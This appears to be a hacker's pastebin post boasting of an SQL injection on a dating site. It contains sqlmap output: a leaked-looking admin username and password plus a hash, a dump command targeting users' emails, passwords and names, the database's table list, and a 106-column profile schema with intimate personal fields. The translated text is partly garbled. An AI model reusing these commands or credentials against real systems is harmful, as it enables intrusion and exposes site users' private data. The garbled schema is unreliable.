
Site Has Been Vuln SQLi By GrenXPaRTa

May 18th, 2021
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MySQL 6.37 KB | None | 0 0
  6. : admin: kazan2014
  7. 795509507c1c78ba896b292ab6dd9071
  9. -D dbride_utf8 -T profile -C email, gender, pass, nama, negara, reg_time --where = "gender = 1" --start = 206000 --stop = 206010 --dump --dump-format = html --batch --threads = 1
  11. 68 tabel guyss. Cekidott Guyss
  13. [INFO] kueri SQL yang digunakan mengembalikan 60 entri
  15. [68 tabel]
  16. + -------------------------------- +
  17. | melihat |
  18. | arrowchat |
  19. | arrowchat_admin |
  20. | arrowchat_applications |
  21. | arrowchat_banlist |
  22. | arrowchat_chatroom_banlist |
  23. | arrowchat_chatroom_messages |
  24. | arrowchat_chatroom_rooms |
  25. | arrowchat_chatroom_users |
  26. | arrowchat_config |
  27. | arrowchat_graph_log |
  28. | arrowchat_notifications |
  29. | arrowchat_notifications_markup |
  30. | arrowchat_smilies |
  31. | arrowchat_status |
  32. | arrowchat_themes |
  33. | arrowchat_trayicons |
  34. | black_list_ip |
  35. | black_list_mail |
  36. | chat_arrow_sessions |
  37. | chat_messages |
  38. | obrolan |
  39. | kontak |
  40. | flashcoms_mp3player_playlists |
  41. | flashcoms_mp3player_songs |
  42. | flashcoms_recorder |
  43. | folder |
  44. | hotlist |
  45. | last_actions |
  46. | last_notifications |
  47. | last_subscriber |
  48. | mail_errors |
  49. | mail_queue |
  50. | mail_spam |
  51. | meet_query |
  52. | bertemu |
  53. | multicards_orders |
  54. | oauth_connections |
  55. | oauth_providers |
  56. | operator |
  57. | pembayaran_order |
  58. | pembayaran |
  59. | foto |
  60. | photos_rating |
  61. | pm |
  62. | pm_phrases |
  63. | hadiah |
  64. | profile_contact_info |
  65. | profil | '242585' laki-laki.
  66. | profiles_abuses |
  67. | profiles_presents |
  68. | kueri |
  69. | referer |
  70. | show_interest |
  71. | special_offers |
  72. | transactpro |
  73. | transactpro_archive |
  74. | verifikasi_log |
  75. | verifikasi_payment_log |
  76. | verifikasi_profiles |
  77. + -------------------------------- +
  79. ---------------- ------------------
  81. Database: dbride_utf8
  82. Tabel: profil
  83. [106 kolom]
  84. + --------------------- ---- + --------------------------- +
  85. | Kolom | Ketik |
  86. + ------------------------- + ----------------------- ---- +
  87. | penyalahgunaan | smallint% 285% 29 + unsigned |
  88. | usia | tinyint% 284% 29 + unsigned |
  89. | allow_pm | tinyint% 281% 29 |
  90. | bademail | tinyint% 283% 29 + unsigned |
  91. | ulang tahun | tanggal |
  92. | tubuh | mediumint% 288% 29 + unsigned |
  93. | body_stuff | smallint% 285% 29 + unsigned |
  94. | anak-anak | tinyint% 283% 29 + unsigned |
  95. | kota | smallint% 285% 29 + unsigned |
  96. | city_other | varchar% 2850% 29 |
  97. | cookLang | char% 282% 29 |
  98. | negara | smallint% 286% 29 + unsigned |
  99. | beragam | int% 2811% 29 + unsigned |
  100. | disable_mail | smallint% 281% 29 |
  101. | minum | smallint% 285% 29 + unsigned |
  102. | obat-obatan | smallint% 285% 29 + unsigned |
  103. | edit_time | int% 2811% 29 |
  104. | pendidikan | tinyint% 284% 29 + unsigned |
  105. | email | varchar% 2850% 29 |
  106. | etnis | mediumint% 288% 29 + unsigned |
  107. | bersemangat | mediumint% 288% 29 + unsigned |
  108. | mata | mediumint% 288% 29 + unsigned |
  109. | female_vip | int% 2810% 29 |
  110. | jenis kelamin | tinyint% 283% 29 + unsigned |
  111. | getero | tinyint% 284% 29 + unsigned |
  112. | pergi_out | int% 2811% 29 + unsigned |
  113. | gold_exp | int% 2810% 29 |
  114. | gomo | tinyint% 284% 29 + unsigned |
  115. | rambut | mediumint% 288% 29 + unsigned |
  116. | tinggi | mediumint% 288% 29 + unsigned |
  117. | hobi | int% 2811% 29 + unsigned |
  118. | hotlist_from | smallint% 285% 29 + unsigned |
  119. | hotlist_to | int% 2811% 29 |
  120. | ID | mediumint% 288% 29 + unsigned |
  121. | pendapatan | tinyint% 283% 29 + unsigned |
  122. | bunga | int% 2810% 29 + unsigned |
  123. | ip | varchar% 2845% 29 |
  124. | lang | mediumint% 288% 29 + unsigned |
  125. | last_act | int% 2811% 29 + unsigned |
  126. | last_bonus_time | int% 2811% 29 + unsigned |
  127. | last_check | int% 2811% 29 + unsigned |
  128. | last_mail | int% 2811% 29 + unsigned |
  129. | last_notification_check | int% 2811% 29 + unsigned |
  130. | last_notification_mail | int% 2811% 29 + unsigned |
  131. | gaya hidup | int% 2810% 29 + unsigned |
  132. | like_in_sex | int% 2810% 29 + unsigned |
  133. | live_in | smallint% 285% 29 + unsigned |
  134. | mencari | tinyint% 283% 29 + unsigned |
  135. | main_photo | mediumint% 288% 29 + unsigned |
  136. | pernikahan | smallint% 285% 29 + unsigned |
  137. | meet_age_from | tinyint% 284% 29 + unsigned |
  138. | meet_age_to | tinyint% 284% 29 + unsigned |
  139. | meet_city | smallint% 285% 29 + unsigned |
  140. | meet_city_other | varchar% 2850% 29 |
  141. | meet_country | smallint% 285% 29 + unsigned |
  142. | meet_daytime | tinyint% 284% 29 + unsigned |
  143. | meet_for | mediumint% 288% 29 + unsigned |
  144. | meet_target | tinyint% 283% 29 + unsigned |
  145. | musik | int% 2811% 29 + unsigned |
  146. | nama | varchar% 2850% 29 |
  147. | pesan_baru | tinyint% 281% 29 |
  148. | pekerjaan | varchar% 2850% 29 |
  149. | orientasi | tinyint% 283% 29 + unsigned |
  150. | dibayar | int% 2810% 29 + unsigned |
  151. | partner_age_from | tinyint% 284% 29 + unsigned |
  152. | partner_age_to | tinyint% 284% 29 + unsigned |
  153. | partner_city | smallint% 285% 29 + unsigned |
  154. | partner_city_else | varchar% 2850% 29 |
  155. | partner_country | smallint% 285% 29 + unsigned |
  156. | partner_height_from | mediumint% 288% 29 + unsigned |
  157. | partner_height_to | mediumint% 288% 29 + unsigned |
  158. | partner_info | teks |
  159. | partner_subscribed | tinyint% 281% 29 |
  160. | partner_weight_from | mediumint% 288% 29 + unsigned |
  161. | partner_weight_to | mediumint% 288% 29 + unsigned |
  162. | partner_zodiac | smallint% 285% 29 + unsigned |
  163. | lulus | varchar% 2850% 29 |
  164. | ukuran_penis | smallint% 285% 29 + unsigned |
  165. | foto | tinyint% 281% 29 + unsigned |
  166. | peringkat | smallint% 285% 29 + unsigned |
  167. | reg_time | int% 2811% 29 + unsigned |
  168. | agama | mediumint% 288% 29 + unsigned |
  169. | merelokasi | tinyint% 281% 29 |
  170. | self_info | teks |
  171. | send_notification | smallint% 281% 29 + unsigned |
  172. | sex_freq | tinyint% 284% 29 + unsigned |
  173. | show_int_from | int% 2811% 29 |
  174. | show_int_to | int% 2811% 29 |
  175. | merokok | smallint% 285% 29 + unsigned |
  176. | olahraga | int% 2811% 29 + unsigned |
  177. | negara bagian | varchar% 2850% 29 |
  178. | status | tinyint% 281% 29 |
  179. | berlangganan | tinyint% 281% 29 |
  180. | mencurigakan | tinyint% 283% 29 + unsigned |
  181. | target | mediumint% 289% 29 + unsigned |
  182. | ukuran_ payudara | smallint% 285% 29 + unsigned |
  183. | unit | ganda + unsigned |
  184. | diverifikasi | diverifikasi tinyint% 283% 29 + unsigned |
  185. | video | varchar% 28255% 29 |
  186. | video_status | tinyint% 281% 29 + unsigned |
  187. | view_from | int% 2811% 29 |
  188. | view_to | int% 2811% 29 |
  189. | want_children | tinyint% 281% 29 |
  190. | berat | mediumint% 288% 29 + unsigned |
  191. | zip | varchar% 2810% 29 |
  192. | zodiak | smallint% 286% 29 + unsigned |
  193. + ------------------------- + ----------------------- ---- +
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